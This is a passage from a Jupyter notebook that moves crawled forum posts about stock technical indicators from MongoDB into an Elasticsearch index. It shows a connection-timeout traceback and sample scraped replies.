\u001b[0mtitle\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'title'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 5\u001b[0m \u001b[0mcontent\u001b[0m\u001b[1;33m=\u001b[0m\u001b[0mitem\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mget\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;34m'content'\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 159 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36mnext\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1187\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__empty\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1188\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0mStopIteration\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1189\u001b[1;33m \u001b[1;32mif\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__data\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_refresh\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1190\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__manipulate\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 
1191\u001b[0m \u001b[0m_db\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__collection\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdatabase\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 160 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36m_refresh\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1124\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__collection\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdatabase\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mclient\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1125\u001b[0m self.__max_await_time_ms)\n\u001b[1;32m-> 1126\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__send_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1127\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1128\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__data\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 161 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36m__send_message\u001b[1;34m(self, operation)\u001b[0m\n\u001b[0;32m 929\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 930\u001b[0m response = client._send_message_with_response(\n\u001b[1;32m--> 931\u001b[1;33m operation, exhaust=self.__exhaust, address=self.__address)\n\u001b[0m\u001b[0;32m 932\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__address\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mresponse\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0maddress\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 933\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__exhaust\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 162 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\mongo_client.py\u001b[0m in \u001b[0;36m_send_message_with_response\u001b[1;34m(self, operation, exhaust, address)\u001b[0m\n\u001b[0;32m 1143\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__all_credentials\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1144\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_event_listeners\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1145\u001b[1;33m exhaust)\n\u001b[0m\u001b[0;32m 1146\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1147\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_reset_on_error\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mserver\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 163 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\mongo_client.py\u001b[0m in \u001b[0;36m_reset_on_error\u001b[1;34m(self, server, func, *args, **kwargs)\u001b[0m\n\u001b[0;32m 1154\u001b[0m \"\"\"\n\u001b[0;32m 1155\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1156\u001b[1;33m \u001b[1;32mreturn\u001b[0m 
\u001b[0mfunc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1157\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mNetworkTimeout\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1158\u001b[0m \u001b[1;31m# The socket has been closed. Don't reset the server.\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 164 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\server.py\u001b[0m in \u001b[0;36msend_message_with_response\u001b[1;34m(self, operation, set_slave_okay, all_credentials, listeners, exhaust)\u001b[0m\n\u001b[0;32m 104\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 105\u001b[0m \u001b[0msock_info\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msend_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mdata\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mmax_doc_size\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 106\u001b[1;33m \u001b[0mreply\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0msock_info\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mreceive_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mrequest_id\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 107\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mexc\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 108\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mpublish\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 165 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(self, request_id)\u001b[0m\n\u001b[0;32m 610\u001b[0m self.max_message_size)\n\u001b[0;32m 611\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mBaseException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 612\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_raise_connection_failure\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 613\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 614\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_raise_if_not_writable\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0munacknowledged\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 166 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36m_raise_connection_failure\u001b[1;34m(self, error)\u001b[0m\n\u001b[0;32m 741\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mclose\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 742\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0msocket\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 743\u001b[1;33m \u001b[0m_raise_connection_failure\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0maddress\u001b[0m\u001b[1;33m,\u001b[0m 
\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 744\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 745\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 167 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36m_raise_connection_failure\u001b[1;34m(address, error, msg_prefix)\u001b[0m\n\u001b[0;32m 281\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0mNetworkTimeout\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 282\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 283\u001b[1;33m \u001b[1;32mraise\u001b[0m \u001b[0mAutoReconnect\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 284\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 285\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n", 168 | "\u001b[1;31mAutoReconnect\u001b[0m: 10.18.6.46:27001: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。" 169 | ] 170 | } 171 | ], 172 | "source": [ 173 | "url_set = set()\n", 174 | "for item in doc.find():\n", 175 | " creator=item.get('creator')\n", 176 | " title=item.get('title')\n", 177 | " content=item.get('content')\n", 178 | " resp_no=item.get('resp_no')\n", 179 | " createTime=item.get('createTime')\n", 180 | " \n", 181 | " url=item.get('url')\n", 182 | " if url in url_set:\n", 183 | " continue\n", 184 | " else:\n", 185 | " url_set.add(url)\n", 186 | " \n", 187 | " if createTime is None:\n", 188 | " save_db.insert_one({'url':url})\n", 189 | " continue\n", 190 | " \n", 191 | " createTime=datetime.datetime.strptime(createTime,'%Y-%m-%d %H:%M').strftime('%Y-%m-%dT%H:%M:%S')\n", 192 | "\n", 193 | " crawlTime=item.get('crawlTime')\n", 194 | " crawlTime=datetime.datetime.strptime(crawlTime,'%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S')\n", 195 | "\n", 196 | " \n", 197 | " resp_list=item.get('resp')\n", 198 | " last_resp_date=item.get('last_resp_date')\n", 199 | " last_resp_date=datetime.datetime.strptime(last_resp_date,'%Y-%m-%d %H:%M').strftime('%Y-%m-%dT%H:%M:%S')\n", 200 | "\n", 201 | " _resp_list=[]\n", 202 | " for sub_resp in resp_list:\n", 203 | " resp_author = list(sub_resp.keys())[0]\n", 204 | " _resp_author=''.join(resp_author.split('_')[:-1])\n", 205 | " agree=sub_resp[resp_author][0]\n", 206 | " resp_content=sub_resp[resp_author][1]\n", 207 | " d={}\n", 208 | " d['resp_agree']=int(agree)\n", 209 | " d['resp_author']=_resp_author\n", 210 | " d['resp_content']=resp_content\n", 211 | "\n", 212 | " _resp_list.append(d)\n", 213 | " # last_resp_date=item.get('last_resp_date')\n", 214 | "\n", 215 | " body = {\n", 216 | " 'creator':creator,\n", 217 | " 'title':title,\n", 218 | " 'content':content,\n", 219 | " 'resp_no':int(resp_no),\n", 220 | " 'createTime':createTime,\n", 221 | " 'crawlTime':crawlTime,\n", 222 | " 'url':url,\n", 223 | " 'resp':_resp_list,\n", 224 | " 'last_resp_date':last_resp_date\n", 225 | " }\n", 226 | "\n", 227 | " es.index(index='jsl',doc_type='doc',body=body)" 228 | ] 229 | }, 230 | { 231 | "cell_type": "code", 232 | "execution_count": 23, 233 | "metadata": {}, 234 | "outputs": [ 235 | { 236 | "data": { 237 | "text/plain": [ 238 | "'2019-03-16 09:54:43'" 239 | ] 240 | }, 241 | "execution_count": 23, 242 | "metadata": {}, 243 | "output_type": "execute_result" 244 | } 245 | ], 246 | 
"source": [ 247 | "crawlTime" 248 | ] 249 | }, 250 | { 251 | "cell_type": "code", 252 | "execution_count": 19, 253 | "metadata": {}, 254 | "outputs": [ 255 | { 256 | "data": { 257 | "text/plain": [ 258 | "[{'resp_agree': 0,\n", 259 | " 'resp_author': 'seeker24680',\n", 260 | " 'resp_content': '可以说很多不明觉厉的词,适合用于忽悠别人,具体效果同风水先生。'},\n", 261 | " {'resp_agree': 0,\n", 262 | " 'resp_author': 'joyfulli',\n", 263 | " 'resp_content': '首先要知道技术指标是怎么来的\\n对过去的数据进行统计分析,然后进行预测\\n说白了就是统计学\\n所以,学过统计学就知道技术分析怎么用了'},\n", 264 | " {'resp_agree': 0, 'resp_author': '老高0813', 'resp_content': '基本没卵用'},\n", 265 | " {'resp_agree': 0, 'resp_author': 'z383788052', 'resp_content': '从来只看指标,只看k'},\n", 266 | " {'resp_agree': 0,\n", 267 | " 'resp_author': '花园小琴',\n", 268 | " 'resp_content': '看图形,一般只看低买高卖,但事后后悔,赚少了'},\n", 269 | " {'resp_agree': 0,\n", 270 | " 'resp_author': '风险搬运工',\n", 271 | " 'resp_content': '趋势(多和空)和震荡结合得做(同时做),不做单边、所谓轮动策略。\\n倾向于胜率低,赔率高的策略。'},\n", 272 | " {'resp_agree': 0,\n", 273 | " 'resp_author': 'smag',\n", 274 | " 'resp_content': '基本不看指标,静下心感受波动,在波动中下注。。。'},\n", 275 | " {'resp_agree': 0, 'resp_author': '海浪头头', 'resp_content': '同意美棠子的看法'},\n", 276 | " {'resp_agree': 0,\n", 277 | " 'resp_author': 'jsl0900',\n", 278 | " 'resp_content': '从技术指标上看,我可以预测所有交易标的的后续走势,至于准确不准确,那不是我关心的问题'},\n", 279 | " {'resp_agree': 4,\n", 280 | " 'resp_author': '美棠子',\n", 281 | " 'resp_content': '只是个辅助工具,基本面是核心,切不可颠倒主次。'},\n", 282 | " {'resp_agree': 0, 'resp_author': '蔓越橘', 'resp_content': '用于T一下可以,其他就算了吧。'}]" 283 | ] 284 | }, 285 | "execution_count": 19, 286 | "metadata": {}, 287 | "output_type": "execute_result" 288 | } 289 | ], 290 | "source": [ 291 | "_resp_list" 292 | ] 293 | }, 294 | { 295 | "cell_type": "code", 296 | "execution_count": null, 297 | "metadata": { 298 | "scrolled": true 299 | }, 300 | "outputs": [], 301 | "source": [ 302 | "for item in doc.find_one():\n" 303 | ] 304 | }, 305 | { 306 | "cell_type": "code", 307 | "execution_count": null, 308 | "metadata": {}, 309 | "outputs": [], 310 | "source": [ 311 | "db" 312 | ] 313 | } 314 | ], 315 | "metadata": { 316 | "kernelspec": { 317 | "display_name": "Python 3", 318 | "language": "python", 319 | "name": "python3" 320 | }, 321 | "language_info": { 322 | "codemirror_mode": { 323 | "name": "ipython", 324 | "version": 3 325 | }, 326 | "file_extension": ".py", 327 | "mimetype": "text/x-python", 328 | "name": "python", 329 | "nbconvert_exporter": "python", 330 | "pygments_lexer": "ipython3", 331 | "version": "3.7.0" 332 | } 333 | }, 334 | "nbformat": 4, 335 | "nbformat_minor": 2 336 | } 337 | --------------------------------------------------------------------------------